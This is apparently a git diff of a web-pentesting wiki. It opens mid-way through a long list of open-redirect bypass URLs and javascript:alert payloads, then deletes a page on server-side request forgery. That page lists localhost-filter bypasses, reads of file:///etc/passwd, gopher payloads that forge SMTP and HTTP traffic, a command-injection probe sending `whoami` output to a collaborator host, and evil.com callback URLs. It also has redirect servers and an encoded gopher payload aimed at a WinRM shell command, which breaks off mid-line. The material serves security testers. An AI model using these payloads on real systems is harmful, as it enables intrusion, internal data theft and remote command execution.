-/https:/%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -https://%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -https:/%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -/https://%5cgoogle.com -/https:/%5cgoogle.com/ -https://%5cgoogle.com -https:/%5cgoogle.com/ -/https://%5cwhitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -https://%5cwhitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -/https://%5cwhitelisted.com@google.com -https://%5cwhitelisted.com@google.com -https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77 -//https://google.com// -/https://google.com// -/https://google.com/ -/https://google.com -/https:google.com -https://////google.com -https://google.com// -https://google.com/ -https://google.com -https:/\google.com -https:google.com -//https:///google.com/%2e%2e -/https://google.com/%2e%2e -https:///google.com/%2e%2e -//https://google.com/%2e%2e%2f -https://google.com/%2e%2e%2f -/https://google.com/%2f.. -https://google.com/%2f.. -/https:///google.com/%2f%2e%2e -/https://google.com/%2f%2e%2e -https:///google.com/%2f%2e%2e -https://google.com/%2f%2e%2e -https://:@google.com\@whitelisted.com -https://google.com?whitelisted.com -https://google.com/whitelisted.com -https://google.com\whitelisted.com -https://google.com#whitelisted.com -https://google%E3%80%82com -//https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ// -/https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -https://:@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\@whitelisted.com -https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/whitelisted.com -https://whitelisted.com;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ// -https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -/https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e -https:///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e -//https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f -https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f -/https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f.. -https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f.. -/https:///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e -/https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e -https:///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e -https://whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e -//https://whitelisted.com@google.com// -/https://whitelisted.com@google.com/ -https://whitelisted.com;@google.com -https://whitelisted.com.google.com -https://whitelisted.com@google.com// -https://whitelisted.com@google.com/ -https://whitelisted.com@google.com -/https://whitelisted.com@google.com/%2e%2e -https:///whitelisted.com@google.com/%2e%2e -//https://whitelisted.com@google.com/%2e%2e%2f -https://whitelisted.com@google.com/%2e%2e%2f -/https://whitelisted.com@google.com/%2f.. -https://whitelisted.com@google.com/%2f.. -/https:///whitelisted.com@google.com/%2f%2e%2e -/https://whitelisted.com@google.com/%2f%2e%2e -https:///whitelisted.com@google.com/%2f%2e%2e -https://whitelisted.com@google.com/%2f%2e%2e -/https://whitelisted.com@google.com/%2f.//whitelisted.com@google.com/%2f.. -https://whitelisted.com/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -https://whitelisted.com/https://google.com/ -@https://www.google.com -http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\twhitelisted.com/ -http://whitelisted.com@00330.00072.0000326.00000316 -http:whitelisted.com@00330.00072.0000326.00000316 -http://whitelisted.com@00330.0x3a.54990 -http:whitelisted.com@00330.0x3a.54990 -http://whitelisted.com@00330.3856078 -http:whitelisted.com@00330.3856078 -http://whitelisted.com@0330.072.0326.0316 -http:whitelisted.com@0330.072.0326.0316 -http://whitelisted.com@0xd8.072.54990 -http:whitelisted.com@0xd8.072.54990 -http://whitelisted.com@0xd8.0x3a.0xd6.0xce -http:whitelisted.com@0xd8.0x3a.0xd6.0xce -http://whitelisted.com@0xd8.3856078 -http:whitelisted.com@0xd8.3856078 -http://whitelisted.com@0xd83ad6ce -http:whitelisted.com@0xd83ad6ce -http://whitelisted.com@[::216.58.214.206] -http:whitelisted.com@[::216.58.214.206] -http://whitelisted.com%2eⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -http://whitelisted.com%2egoogle.com/ -http://whitelisted.com@3627734734 -http:whitelisted.com@3627734734 -http://whitelisted.com@472.314.470.462 -http:whitelisted.com@472.314.470.462 -http://whitelisted.com:80%40Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -http://whitelisted.com:80%40google.com/ -http://whitelisted.com@[::ffff:216.58.214.206] -http:whitelisted.com@[::ffff:216.58.214.206] -http://whitelisted.com@google.com/ -http://whitelisted.com+&@google.com#+@whitelisted.com/ -http://whitelisted.com+&@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ#+@whitelisted.com/ -http://www.google.com\.whitelisted.com -http://www.Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\.whitelisted.com -http://XY>.7d8T\205pZM@00330.00072.0000326.00000316 -http:XY>.7d8T\205pZM@00330.00072.0000326.00000316 -http://XY>.7d8T\205pZM@00330.0x3a.54990 -http:XY>.7d8T\205pZM@00330.0x3a.54990 -http://XY>.7d8T\205pZM@00330.3856078 -http:XY>.7d8T\205pZM@00330.3856078 -http://XY>.7d8T\205pZM@0330.072.0326.0316 -http:XY>.7d8T\205pZM@0330.072.0326.0316 -http://XY>.7d8T\205pZM@0xd8.072.54990 -http:XY>.7d8T\205pZM@0xd8.072.54990 -http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce -http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce -http://XY>.7d8T\205pZM@0xd8.3856078 -http:XY>.7d8T\205pZM@0xd8.3856078 -http://XY>.7d8T\205pZM@0xd83ad6ce -http:XY>.7d8T\205pZM@0xd83ad6ce -http://XY>.7d8T\205pZM@[::216.58.214.206] -http:XY>.7d8T\205pZM@[::216.58.214.206] -http://XY>.7d8T\205pZM@3627734734 -http:XY>.7d8T\205pZM@3627734734 -http://XY>.7d8T\205pZM@472.314.470.462 -http:XY>.7d8T\205pZM@472.314.470.462 -http://XY>.7d8T\205pZM@[::ffff:216.58.214.206] -http:XY>.7d8T\205pZM@[::ffff:216.58.214.206] -http://XY>.7d8T\205pZM@whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -http://XY>.7d8T\205pZM@whitelisted.com+@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -http://XY>.7d8T\205pZM@whitelisted.com@google.com/ -http://XY>.7d8T\205pZM@whitelisted.com+@google.com/ -ja\nva\tscript\r:alert(1) -java%09script:alert(1) -java%0ascript:alert(1) -java%0d%0ascript%0d%0a:alert(0) -java%0dscript:alert(1) -Javas%26%2399;ript:alert(1) -//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\twhitelisted.com/ -\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1) -////whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ// -////whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ// -///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/whitelisted.com -//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\@whitelisted.com -//whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ// -//whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/whitelisted.com -whitelisted.com;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ -////whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e -///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e -////whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f -///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f -//whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f -////whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f.. -///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f.. -//whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f.. -////whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e -///whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e -//whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e -/\whitelisted.com:80%40google.com -whitelisted.com@%E2%80%AE@google.com -////whitelisted.com@google.com// -////whitelisted.com@google.com/ -///whitelisted.com@google.com// -///whitelisted.com@google.com/ -//whitelisted.com@google.com// -//whitelisted.com@google.com/ -whitelisted.com;@google.com -whitelisted.com.google.com -////whitelisted.com@google.com/%2e%2e -///whitelisted.com@google.com/%2e%2e -////whitelisted.com@google.com/%2e%2e%2f -///whitelisted.com@google.com/%2e%2e%2f -//whitelisted.com@google.com/%2e%2e%2f -////whitelisted.com@google.com/%2f.. -///whitelisted.com@google.com/%2f.. -//whitelisted.com@google.com/%2f.. -////whitelisted.com@google.com/%2f%2e%2e -///whitelisted.com@google.com/%2f%2e%2e -//whitelisted.com@google.com/%2f%2e%2e -//whitelisted.com+&@google.com#+@whitelisted.com/ -//whitelisted.com@https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e -//whitelisted.com@https:///google.com/%2e%2e -//whitelisted.com+&@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ#+@whitelisted.com/ -\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1) -//XY>.7d8T\205pZM@whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -//XY>.7d8T\205pZM@whitelisted.com+@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/ -//XY>.7d8T\205pZM@whitelisted.com@google.com/ -//XY>.7d8T\205pZM@whitelisted.com+@google.com/ ``` ## Open Redirect uploading svg files diff --git a/pentesting-web/pocs-and-polygloths-cheatsheet/README.md b/pentesting-web/pocs-and-polygloths-cheatsheet/README.md index 4cff3481d..f7d17eaa0 100644 --- a/pentesting-web/pocs-and-polygloths-cheatsheet/README.md +++ b/pentesting-web/pocs-and-polygloths-cheatsheet/README.md @@ -125,7 +125,7 @@ http://asdasdasdasd.burpcollab.com/mal.php \\asdasdasdasd.burpcollab.com/mal.php ``` -## [Open Redirect](../open-redirect.md) / [Server Side Request Forgery](../ssrf-server-side-request-forgery.md) +## [Open Redirect](../open-redirect.md) / [Server Side Request Forgery](../ssrf-server-side-request-forgery/) ### Basic Tests @@ -164,7 +164,7 @@ x=>alert(/C x=>alert(/Chrome%20XSS%20filter%20bypass/);> ``` -## [Server Side Request Forgery](../ssrf-server-side-request-forgery.md) +## [Server Side Request Forgery](../ssrf-server-side-request-forgery/) The same tests used for Open Redirect can be used here. diff --git a/pentesting-web/ssrf-server-side-request-forgery.md b/pentesting-web/ssrf-server-side-request-forgery.md deleted file mode 100644 index e26a67c37..000000000 --- a/pentesting-web/ssrf-server-side-request-forgery.md +++ /dev/null @@ -1,1289 +0,0 @@ -# SSRF (Server Side Request Forgery) - -## What is Server Side Request Forgery? - -Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to **induce the server-side application to make HTTP requests to an arbitrary domain** of the attacker's choosing. (From [here](https://portswigger.net/web-security/ssrf)) - -## What you should try to do - -* Accessing to **local files** (file://) -* Trying to access to **local IP** - * Local **IP bypass** - * **DNS spoofing** (domains pointing to 127.0.0.1) - * **DNS Rebinding** (resolves to an IP and next time to a local IP: [http://rbnd.gl0.eu/dnsbin](http://rbnd.gl0.eu/dnsbin)). This is useful to bypass configurations which resolves the given domain and check it against a white-list and then try to access it again (as it has to resolve the domain again a different IP can be served by the DNS). More [info here](https://geleta.eu/2019/my-first-ssrf-using-dns-rebinfing/). -* Trying to make an **internal assets discovery and internal port scan**. -* Accessing **private content** (filtered by IP or only accessible locally, like _/admin_ path). - -## Internet Exfiltration Services - -You could use **burpcollab** or [**pingb**](http://pingb.in) for example. - -## Bypass restrictions - -{% embed url="https://tools.intigriti.io/redirector/" %} - -### Basic bypass localhost - -```bash -## Localhost -http://127.0.0.1:80 -http://127.0.0.1:443 -http://127.0.0.1:22 -http://127.1:80 -http://0 -http://0.0.0.0:80 -http://localhost:80 -http://[::]:80/ -http://[::]:25/ SMTP -http://[::]:3128/ Squid -http://[0000::1]:80/ -http://[0:0:0:0:0:ffff:127.0.0.1]/thefile -http://①②⑦.⓪.⓪.⓪ - -## CDIR bypass -http://127.127.127.127 -http://127.0.1.3 -http://127.0.0.0 - -## Decimal bypass -http://2130706433/ = http://127.0.0.1 -http://017700000001 = http://127.0.0.1 -http://3232235521/ = http://192.168.0.1 -http://3232235777/ = http://192.168.1.1 - -## Hexadecimal bypass -127.0.0.1 = 0x7f 00 00 01 -http://0x7f000001/ = http://127.0.0.1 -http://0xc0a80014/ = http://192.168.0.20 - -##Domain FUZZ bypass (from https://github.com/0x221b/Wordlists/blob/master/Attacks/SSRF/Whitelist-bypass.txt) -http://{domain}@127.0.0.1 -http://127.0.0.1#{domain} -http://{domain}.127.0.0.1 -http://127.0.0.1/{domain} -http://127.0.0.1/?d={domain} -https://{domain}@127.0.0.1 -https://127.0.0.1#{domain} -https://{domain}.127.0.0.1 -https://127.0.0.1/{domain} -https://127.0.0.1/?d={domain} -http://{domain}@localhost -http://localhost#{domain} -http://{domain}.localhost -http://localhost/{domain} -http://localhost/?d={domain} -http://127.0.0.1%00{domain} -http://127.0.0.1?{domain} -http://127.0.0.1///{domain} -https://127.0.0.1%00{domain} -https://127.0.0.1%0A{domain} -https://127.0.0.1?{domain} -https://127.0.0.1///{domain} -``` - -### Bypass using DNS -> localhost - -```bash -localtest.me = 127.0.0.1 -customer1.app.localhost.my.company.127.0.0.1.nip.io = 127.0.0.1 -mail.ebc.apple.com = 127.0.0.6 (localhost) -127.0.0.1.nip.io = 127.0.0.1 (Resolves to the given IP) -www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us = Resolves to www.google.com -http://customer1.app.localhost.my.company.127.0.0.1.nip.io -http://bugbounty.dod.network = 127.0.0.2 (localhost) -1ynrnhl.xip.io == 169.254.169.254 -spoofed.burpcollaborator.net = 127.0.0.1 -``` - -### Blackslash-trick - -In short, the _backslash-trick_ relies on exploiting a minor difference between two “URL” specifications: the [WHATWG URL Standard](https://url.spec.whatwg.org/#url-parsing), and [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B). RFC3986 is a generic, multi-purpose specification for the syntax of _Uniform Resource Identifiers_, while the WHATWG URL Standard is specifically aimed at the Web, and at URLs (which are a subset of URIs). Modern browsers implement the WHATWG URL Standard. - -Both of them describe a way of parsing URI/URLs, with one slight difference. The WHATWG specification describes [one extra character](https://url.spec.whatwg.org/#authority-state), the `\`, which behaves just like `/`: ends the hostname & authority and starts the path of the URL. - -![The two specifications parsing the same URL differently](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg) - -``` -url=https://attacker.com\@victim.com/ -url=https://attacker.com\anything@victim.com/ -``` - -### Other Confusions - -![](<../.gitbook/assets/image (629).png>) - -image from [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/) - -### Other bypasses - -```bash -## Malformed URLs and rare addresses -localhost:+11211aaa -localhost:00011211aaaa -http://0/ -http://127.1 -http://127.0.1 - -## Tricks -http://1.1.1.1 &@2.2.2.2# @3.3.3.3/ -urllib2 : 1.1.1.1 -requests + browsers : 2.2.2.2 -urllib : 3.3.3.3 -filter_var() php function: 0://evil.com:80;http://google.com:80/ - -## Weakparser -http://127.1.1.1:80\@127.2.2.2:80/ -http://127.1.1.1:80\@@127.2.2.2:80/ -http://127.1.1.1:80:\@@127.2.2.2:80/ -http://127.1.1.1:80#\@127.2.2.2:80/ -``` - -### [More Domain format Bypasses](open-redirect.md#more-domain-bypasses) - -### Bypass domain regexp - -[**Go to the proposed bypasses for Referer header in CSRF**](csrf-cross-site-request-forgery.md#referer)\*\*\*\* - -### Bypass via redirect - -It might be possible that the server is **filtering the original request** of a SSRF **but not** a possible **redirect** response to that request.\ -For example, a server vulnerable to SSRF via: `url=https://www.google.com/` might be **filtering the url param**. But if you uses a [python server to respond with a 302](https://pastebin.com/raw/ywAUhFrv) to the place where you want to redirect, you might be able to **access filtered IP addresses** like 127.0.0.1 or even filtered **protocols** like gopher.\ -[Check out this report.](https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530) - -```python -#!/usr/bin/env python3 - -#python3 ./redirector.py 8000 http://127.0.0.1/ - -import sys -from http.server import HTTPServer, BaseHTTPRequestHandler - -if len(sys.argv)-1 != 2: - print("Usage: {} ".format(sys.argv[0])) - sys.exit() - -class Redirect(BaseHTTPRequestHandler): - def do_GET(self): - self.send_response(302) - self.send_header('Location', sys.argv[2]) - self.end_headers() - -HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever() -``` - -### Bypass via open redirect - -If the server is correctly protected you could **bypass all the restrictions by exploiting an Open Redirect inside the web page**. Because the webpage will allow **SSRF to the same domain** and probably will **follow redirects**, you can exploit the **Open Redirect to make the server to access internal any resource**.\ -Read more here: [https://portswigger.net/web-security/ssrf](https://portswigger.net/web-security/ssrf) - -## SSRF via Referrer header - -Some applications employ server-side analytics software that tracks visitors. This software often logs the Referrer header in requests, since this is of particular interest for tracking incoming links. Often the analytics software will actually visit any third-party URL that appears in the Referrer header. This is typically done to analyze the contents of referring sites, including the anchor text that is used in the incoming links. As a result, the Referer header often represents fruitful attack surface for SSRF vulnerabilities.\ -To discover this kind of "hidden" vulnerabilities you could use the plugin "**Collaborator Everywhere**" from Burp. - -## Server browser enumeration - -You can use applications like [http://webhook.site](http://webhook.site) to find which browser is being used. - -## Exploitation - -### [Wget file upload](file-upload/#wget-file-upload-ssrf-trick) - -### file:// - -``` -file:///etc/passwd -``` - -### dict:// - -The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol: - -``` -dict://;@:/d::: -ssrf.php?url=dict://attacker:11111/ -``` - -### SFTP:// - -A network protocol used for secure file transfer over secure shell - -``` -ssrf.php?url=sftp://evil.com:11111/ -``` - -### TFTP:// - -Trivial File Transfer Protocol, works over UDP - -``` -ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET -``` - -### LDAP:// - -Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service. - -``` -ssrf.php?url=ldap://localhost:11211/%0astats%0aquit -``` - -### Gopher:// - -Using this protocol you can specify the **IP, port and bytes** you want the server to **send**. Then, you can basically exploit a SSRF to **communicate with any TCP server** (but you need to know how to talk to the service first).\ -Fortunately, you can use [Gopherus](https://github.com/tarunkant/Gopherus) to create payloads for several services. Additionally, [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) can be used to create _gopher_ payloads for _Java RMI_ services. - -#### Gopher smtp - -``` -ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a -will make a request like -HELO localhost -MAIL FROM: -RCPT TO: -DATA -From: [Hacker] -To: -Date: Tue, 15 Sep 2017 17:20:26 -0400 -Subject: Ah Ah AHYou didn't say the magic word ! -. -QUIT -``` - -#### Gopher HTTP - -```bash -#For new lines you can use %0A, %0D%0A -gopher://:8080/_GET / HTTP/1.0%0A%0A -gopher://:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body -``` - -#### Gopher SMTP — Back connect to 1337 - -{% code title="redirect.php" %} -```php -Now query it. -https://example.com/?q=http://evil.com/redirect.php. -``` -{% endcode %} - -### SMTP - -From [https://twitter.com/har1sec/status/1182255952055164929](https://twitter.com/har1sec/status/1182255952055164929):\ -1\. connect with SSRF on smtp localhost:25\ -2\. from the first line get the internal domain name 220[ http://blabla.internaldomain.com ](https://t.co/Ad49NBb7xy)ESMTP Sendmail\ -3\. search[ http://internaldomain.com ](https://t.co/K0mHR0SPVH)on github, find subdomains\ -4\. connect - -### SSRF with Command Injection - -It might be worth trying a payload like: `` url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami` `` - -### Exploiting PDFs Rendering - -If the web page is automatically creating a PDF with some information you have provided, you can **insert some JS that will be executed by the PDF creator** itself (the server) while creating the PDF and you will be able to abuse a SSRF. [**Find more information here**](xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)**.** - -### From SSRF to DoS - -Create several sessions and try to download heavy files exploiting the SSRF from the sessions. - -### SSRF Redirect to Gopher - -For some exploitations you might need to **send a redirect response** (potentially to use a different protocol like gopher). Here you have different python codes to respond with a redirect: - -```python -# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes -from http.server import HTTPServer, BaseHTTPRequestHandler -import ssl - -class MainHandler(BaseHTTPRequestHandler): - def do_GET(self): - print("GET") - self.send_response(301) - self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%2